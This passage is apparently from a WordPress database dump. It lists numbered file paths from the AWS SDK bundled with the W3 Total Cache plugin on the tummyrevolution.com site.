php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/paginators-1.json.php'),(5939,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/gamelift/2015-10-01/smoke.json.php'),(5940,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/api-2.json.php'),(5941,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/paginators-1.json.php'),(5942,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/smoke.json.php'),(5943,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-1.json.php'),(5944,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glacier/2012-06-01/waiters-2.json.php'),(5945,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/api-2.json.php'),(5946,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/globalaccelerator/2018-08-08/paginators-1.json.php'),(5947,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/api-2.json.php'),(5948,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/paginators-1.json.php'),(5949,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/glue/2017-03-31/smoke.json.php'),(5950,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrass/2017-06-07/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrass/2017-06-07/api-2.json.php'),(5951,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/api-2.json.php'),(5952,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/greengrassv2/2020-11-30/paginators-1.json.php'),(5953,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/api-2.json.php'),(5954,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/groundstation/2019-05-23/paginators-1.json.php'),(5955,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/api-2.json.php'),(5956,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/guardduty/2017-11-28/paginators-1.json.php'),(5957,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/api-2.json.php'),(5958,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/health/2016-08-04/paginators-1.json.php'),(5959,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/healthlake/2017-07-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/healthlake/2017-07-01/api-2.json.php'),(5960,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/healthlake/2017-07-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/healthlake/2017-07-01/paginators-1.json.php'),(5961,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/honeycode/2020-03-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/honeycode/2020-03-01/api-2.json.php'),(5962,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/honeycode/2020-03-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/honeycode/2020-03-01/paginators-1.json.php'),(5963,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/api-2.json.php'),(5964,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/paginators-1.json.php'),(5965,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/smoke.json.php'),(5966,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iam/2010-05-08/waiters-2.json.php'),(5967,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/api-2.json.php'),(5968,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/identitystore/2020-06-15/paginators-1.json.php'),(5969,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/api-2.json.php'),(5970,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/imagebuilder/2019-12-02/paginators-1.json.php'),(5971,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/api-2.json.php'),(5972,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/importexport/2010-06-01/paginators-1.json.php'),(5973,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/api-2.json.php'),(5974,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/paginators-1.json.php'),(5975,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/inspector/2016-02-16/smoke.json.php'),(5976,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/api-2.json.php'),(5977,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/paginators-1.json.php'),(5978,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot/2015-05-28/smoke.json.php'),(5979,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/api-2.json.php'),(5980,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot-jobs-data/2017-09-29/paginators-1.json.php'),(5981,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-devices/2018-05-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-devices/2018-05-14/api-2.json.php'),(5982,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/api-2.json.php'),(5983,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iot1click-projects/2018-05-14/paginators-1.json.php'),(5984,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/api-2.json.php'),(5985,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotanalytics/2017-11-27/paginators-1.json.php'),(5986,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/api-2.json.php'),(5987,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotdeviceadvisor/2020-09-18/paginators-1.json.php'),(5988,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/api-2.json.php'),(5989,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents/2018-07-27/paginators-1.json.php'),(5990,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/api-2.json.php'),(5991,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotevents-data/2018-10-23/paginators-1.json.php'),(5992,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/api-2.json.php'),(5993,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotfleethub/2020-11-03/paginators-1.json.php'),(5994,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05/api-2.json.php'),(5995,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsecuretunneling/2018-10-05/paginators-1.json.php'),(5996,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/api-2.json.php'),(5997,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/paginators-1.json.php'),(5998,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotsitewise/2019-12-02/waiters-2.json.php'),(5999,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/api-2.json.php'),(6000,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotthingsgraph/2018-09-06/paginators-1.json.php'),(6001,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/api-2.json.php'),(6002,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/iotwireless/2020-11-22/paginators-1.json.php'),(6003,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/api-2.json.php'),(6004,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/ivs/2020-07-14/paginators-1.json.php'),(6005,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/api-2.json.php'),(6006,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kafka/2018-11-14/paginators-1.json.php'),(6007,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kendra/2019-02-03/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kendra/2019-02-03/api-2.json.php'),(6008,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kendra/2019-02-03/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kendra/2019-02-03/paginators-1.json.php'),(6009,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/api-2.json.php'),(6010,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/paginators-1.json.php'),(6011,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/smoke.json.php'),(6012,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis/2013-12-02/waiters-2.json.php'),(6013,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/api-2.json.php'),(6014,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-archived-media/2017-09-30/paginators-1.json.php'),(6015,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/api-2.json.php'),(6016,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-media/2017-09-30/paginators-1.json.php'),(6017,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/api-2.json.php'),(6018,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesis-video-signaling/2019-12-04/paginators-1.json.php'),(6019,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/api-2.json.php'),(6020,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalytics/2015-08-14/paginators-1.json.php'),(6021,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/api-2.json.php'),(6022,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisanalyticsv2/2018-05-23/paginators-1.json.php'),(6023,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/api-2.json.php'),(6024,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kinesisvideo/2017-09-30/paginators-1.json.php'),(6025,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/api-2.json.php'),(6026,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/paginators-1.json.php'),(6027,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/kms/2014-11-01/smoke.json.php'),(6028,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/api-2.json.php'),(6029,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lakeformation/2017-03-31/paginators-1.json.php'),(6030,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/api-2.json.php'),(6031,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/paginators-1.json.php'),(6032,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/smoke.json.php'),(6033,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/waiters-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lambda/2015-03-31/waiters-2.json.php'),(6034,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/api-2.json.php'),(6035,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lex-models/2017-04-19/paginators-1.json.php'),(6036,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/api-2.json.php'),(6037,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/license-manager/2018-08-01/paginators-1.json.php'),(6038,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/api-2.json.php'),(6039,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/paginators-1.json.php'),(6040,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/smoke.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/lightsail/2016-11-28/smoke.json.php'),(6041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/api-2.json.php'),(6042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/paginators-1.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/location/2020-11-19/paginators-1.json.php'),(6043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/data/logs/2014-03-28/api-2.json.php','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/